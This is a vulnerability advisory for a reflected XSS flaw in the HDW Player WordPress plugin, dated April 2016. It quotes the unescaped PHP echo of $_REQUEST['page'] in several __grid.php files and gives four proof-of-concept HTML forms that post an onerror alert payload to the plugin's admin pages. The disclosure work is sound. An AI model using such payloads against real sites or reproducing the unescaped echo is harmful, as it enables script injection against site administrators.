HDW Player Plugin [Reflected XSS]
Description
The problem is in the following code:
file: hdw-player-video-player-video-gallery/hdwplayer/__grid.php
line: 112
<input type="hidden" name="page" value="<?php echo $_REQUEST['page'] ?>" />
Same snippet exists in files:
hdw-player-video-player-video-gallery/playlist/__grid.phphdw-player-video-player-video-gallery/gallery/__grid.phphdw-player-video-player-video-gallery/videos/__grid.php
WordPress upon initialization assigns to $_REQUEST first from $_GET
and after from $_POST. This could allow to an attacker to direct a
POST request to a specific admin page and still manipulate the
$_REQUEST['page'] value.
PoC
<form action="http://sbwp1.dev/wp-admin/admin.php?page=hdwplayer" method="post">
<input type="hidden" name="page" value='"><img src=b onerror=alert(1) /><input type="hidden" ' >
<button type="submit">Go To Video List</button>
</form>
<form action="http://sbwp1.dev/wp-admin/admin.php?page=playlist" method="post">
<input type="hidden" name="page" value='"><img src=b onerror=alert(1) /><input type="hidden" ' >
<button type="submit">Go To Playlist</button>
</form>
<form action="http://sbwp1.dev/wp-admin/admin.php?page=gallery" method="post">
<input type="hidden" name="page" value='"><img src=b onerror=alert(1) /><input type="hidden" ' >
<button type="submit">Go To Gallery</button>
</form>
<form action="http://sbwp1.dev/wp-admin/admin.php?page=videos" method="post">
<input type="hidden" name="page" value='"><img src=b onerror=alert(1) /><input type="hidden" ' >
<button type="submit">Go To Videos</button>
</form>
INFO
- 24 April 2016
- Pan Vag
- HDW Player Plugin
- WordPress 4.5
- DWF-2016-87024